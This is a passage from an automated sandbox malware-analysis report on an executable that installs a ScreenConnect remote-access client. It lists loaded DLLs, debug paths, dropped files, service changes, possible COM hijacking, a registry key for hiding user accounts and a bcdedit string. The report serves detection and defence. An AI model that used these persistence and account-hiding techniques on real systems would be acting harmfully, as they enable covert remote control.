Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wkscli.dll	Jump to behavior

Source: C:\Users\user\Desktop\H36NgltNe7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\H36NgltNe7.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

PE / OLE file has a valid certificate

Source: H36NgltNe7.exe

Static PE information: certificate valid

Submission file is bigger than most known malware samples

Source: H36NgltNe7.exe

Static file information: File size 5809056 > 1048576

PE file has a big raw section

Source: H36NgltNe7.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x537600

PE file contains a mix of data directories often seen in goodware

Source: H36NgltNe7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: H36NgltNe7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: H36NgltNe7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: H36NgltNe7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: H36NgltNe7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: H36NgltNe7.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: H36NgltNe7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: H36NgltNe7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: H36NgltNe7.exe
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1530796871.000000000088D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: H36NgltNe7.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: H36NgltNe7.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: H36NgltNe7.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: H36NgltNe7.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: H36NgltNe7.exe, 6f527a.rbs.3.dr, 6f5279.msi.3.dr, 6f527b.msi.3.dr, MSI576D.tmp.3.dr, MSI5509.tmp.3.dr, MSI5529.tmp.3.dr, setup.msi.0.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: H36NgltNe7.exe, 6f5279.msi.3.dr, 6f527b.msi.3.dr, MSI4C3F.tmp.2.dr, setup.msi.0.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1596802211.00000000011E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: H36NgltNe7.exe
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: H36NgltNe7.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: H36NgltNe7.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr

PE file contains a valid data directory to section mapping

Source: H36NgltNe7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: H36NgltNe7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: H36NgltNe7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: H36NgltNe7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: H36NgltNe7.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.H36NgltNe7.exe.2860000.0.raw.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.0.H36NgltNe7.exe.babcf4.4.raw.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])

PE file contains an invalid checksum

Source: H36NgltNe7.exe

Static PE information: real checksum: 0x550b20 should be: 0x591f68

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\H36NgltNe7.exe	Code function: 0_2_00FD1817 push esp; ret	0_2_00FD1821
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Code function: 0_2_00FD3E63 push edx; retf	0_2_00FD3E75
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_3_04DF77E2 push esp; ret	5_3_04DF77E9
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_014E7752 push 8403C4CFh; iretd	8_2_014E7759
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_014E7732 push eax; iretd	8_2_014E7739
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_03DB6B35 push esp; iretd	8_2_03DB6B39
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_03DB1DA8 push esp; retf	8_2_03DB1DB5
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_052CBAC0 push eax; retf	8_2_052CBAC1
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_058A3F61 pushad ; ret	8_2_058A3F73
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFB4ACF10AB push es; iretd	9_2_00007FFB4ACF10B0
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFB4ACF8ECC push cs; iretd	9_2_00007FFB4ACF8ECD
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFB4ACF761F push edi; iretd	9_2_00007FFB4ACF7620
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD01F00 pushad ; iretd	10_2_00007FFB4AD01F01
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD00C39 push esi; iretd	10_2_00007FFB4AD00C3A
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD00C27 push ebp; iretd	10_2_00007FFB4AD00C2A
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD00BFB push ebx; iretd	10_2_00007FFB4AD00C02

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Possible COM Object hijacking

Source: c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.windowscredentialprovider.dll

COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-a44d-4392d823459f}\inprocserver32

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI576D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5529.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI4C3F.tmp-\ScreenConnect.Core.dll	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI576D.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5529.tmp			Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.3.dr

Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Modifies existing windows services

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (20ae101cef0f1acf)

Contains functionality to hide user accounts

Hooking and other Techniques for Hiding and Protection

Source: H36NgltNe7.exe, 00000000.00000002.1492823216.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: rundll32.exe, 00000005.00000003.1506976336.0000000004D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1609453691.000000001BB72000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: H36NgltNe7.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.5.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.3.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll.3.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe

Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\H36NgltNe7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
